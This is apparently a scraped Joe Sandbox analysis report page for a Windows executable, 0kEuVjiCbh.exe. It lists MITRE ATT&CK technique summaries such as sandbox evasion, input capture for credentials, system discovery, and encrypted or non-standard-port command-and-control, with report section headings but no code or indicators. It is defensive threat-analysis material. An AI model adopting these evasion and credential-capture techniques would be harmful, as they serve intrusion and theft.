Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 0kEuVjiCbh.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre